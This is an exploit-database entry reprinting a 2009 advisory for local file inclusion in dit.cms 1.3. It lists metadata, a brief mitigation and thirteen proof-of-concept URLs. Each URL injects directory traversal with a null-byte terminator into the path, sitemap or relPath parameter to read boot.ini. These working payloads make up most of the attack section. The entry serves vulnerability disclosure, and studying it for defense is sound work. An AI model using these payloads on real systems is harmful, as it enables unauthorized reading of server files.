dit.cms 1.3 (path/sitemap/relPath) Local File Inclusion Vulnerabilities

vendor:

dit.cms

by:

SirGod

7,5

CVSS

HIGH

Local File Inclusion

CWE

Product Name: dit.cms

Affected Version From: 1.3

Affected Version To: 1.3

Patch Exists: NO

Related CWE: N/A

CPE: ditcms

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

dit.cms 1.3 (path/sitemap/relPath) Local File Inclusion Vulnerabilities

dit.cms 1.3 is vulnerable to Local File Inclusion. The vulnerable code is present everywhere in the application. The PoC's provided in the text can be used to exploit the vulnerability.

Mitigation:

Disable register_globals and use input validation to prevent malicious input.

Source

Exploit-DB raw data:

##########################################################################################################
[+] dit.cms 1.3 (path/sitemap/relPath) Local File Inclusion Vulnerabilities
[+] Discovered By SirGod
[+] http://insecurity-ro.org
[+] http://h4cky0u.org
##########################################################################################################

[+] Homepage : http://ditcms.org/

[+] Local File Inclusion

 - Note : register_globals = on

 - Vulnerable code is everywhere

 - PoC's

    http://127.0.0.1/path/install/index.php?path=../../../../../../../boot.ini%00

    http://127.0.0.1/path/menus/left_rightslideopen/index.php?path=../../../../../../../../boot.ini%00

    http://127.0.0.1/path/menus/left_rightslideopen/index.php?sitemap=../../../../../../../../boot.ini%00

    http://127.0.0.1/path/menus/side_pullout/index.php?sitemap=../../../../../../../../boot.ini%00

    http://127.0.0.1/path/menus/side_pullout/index.php?path=../../../../../../../../boot.ini%00

    http://127.0.0.1/path/menus/side_slideopen/index.php?path=../../../../../../../../boot.ini%00

    http://127.0.0.1/path/menus/side_slideopen/index.php?sitemap=../../../../../../../../boot.ini%00

    http://127.0.0.1/path/menus/simple/index.php?path=../../../../../../../../boot.ini%00

    http://127.0.0.1/path/menus/top_dropdown/index.php?path=../../../../../../../../boot.ini%00

    http://127.0.0.1/path/menus/top_dropdown/index.php?sitemap=../../../../../../../../boot.ini%00

    http://127.0.0.1/path/menus/topside/index.php?sitemap=../../../../../../../../boot.ini%00

    http://127.0.0.1/path/menus/topside/index.php?path=../../../../../../../../boot.ini%00

    http://127.0.0.1/path/index/index.php?relPath=../../../../../../boot.ini%00


##########################################################################################################

# milw0rm.com [2009-07-30]